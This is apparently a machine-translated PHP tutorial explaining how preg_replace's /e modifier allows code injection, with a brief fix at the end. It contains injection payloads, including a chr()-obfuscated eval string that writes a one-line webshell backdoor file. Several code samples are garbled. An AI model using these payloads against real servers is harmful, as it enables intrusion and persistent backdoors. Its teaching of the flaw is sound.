Use preg_replace's dangerous /e modifier with caution (commonly used for backdoors in one sentence)

Use preg_replace's dangerous /e modifier with caution (commonly used for backdoors in one sentence)_PHP Tutorial

WBOY

Release： 2016-07-21 15:05:23

Original

1142 people have browsed it

preg_replace function prototype:

mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit])

Special instructions:
/e modifier causes preg_replace() to treat the replacement argument as PHP code (after appropriate backreference replacement). Tip: Make sure that replacement forms a valid PHP code string, otherwise PHP will report a syntax parsing error on the line containing preg_replace().
Example:

Copy code The code is as follows:

 
preg_replace (" /(]*>)/e", 
"1.strtoupper(2).3", 
$html_body); 
?> ; 

This will make all HTML tags in the input string uppercase.

Security threat analysis:
Usually the subject parameter is generated by the client, and the client may construct malicious code, for example:

Copy Code The code is as follows:

 
echo preg_replace("/test/e",$_GET["h"],"jutst test"); 
?> 

If we submit ?h=phpinfo(), phpinfo() will be executed (using the /e modifier, preg_replace will treat the replacement parameter as PHP code implement).
What happens if we submit the following code?
?h=eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr( 112).chr(101).chr(110).chr(40).chr(39).chr(100).chr(97).
chr(116).chr(97).chr(47) .chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39) .chr(41).chr(44).chr(39).chr(60).
chr(63).chr(112).chr(104).chr(112).chr(32).chr (101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr (84).chr(91).
chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39 ).chr(41).chr(59))
The plaintext corresponding to the ciphertext is: fputs(fopen(data/a.php,w), );
The execution result is to generate a one-sentence Trojan file a.php in the /data/ directory.

Another difficult example:

Copy code The code is as follows:

 
< ? 
function test($str) 
{ 
} 
echo preg_replace("/s*[php](.+?)[/php]s*/ies", 'test(" 1")', $_GET["h"]); 
?> 

Submit?h=[php]phpinfo()[/php], phpinfo() Will it be enforced?
Definitely not. Because after regular matching, the replacement parameter becomes 'test("phpinfo")', and phpinfo is only used as a string parameter at this time.
Is there any way to make it execute?

Of course. If we submit ?h=[php]{${phpinfo()}}[/php] here, phpinfo() will be executed. Why?
In PHP, if there is a variable in double quotes, the PHP interpreter will replace it with the result of variable interpretation; variables in single quotes will not be processed.
Note: Functions enclosed in double quotes will not be executed and replaced.

Here we need to construct a special variable through {${}}, 'test("{${phpinfo()}}")', to achieve the effect of having the function executed (${ phpinfo()} will be interpreted and executed).
You can do the following test first:

Copy the code The code is as follows:

echo "{${phpinfo ()}}";

phpinfo will be executed successfully.

How to prevent this vulnerability?
Change 'test("1")' to "test('1')" so that '${phpinfo()}' will be treated as an ordinary string (variables in single quotes will not be processed).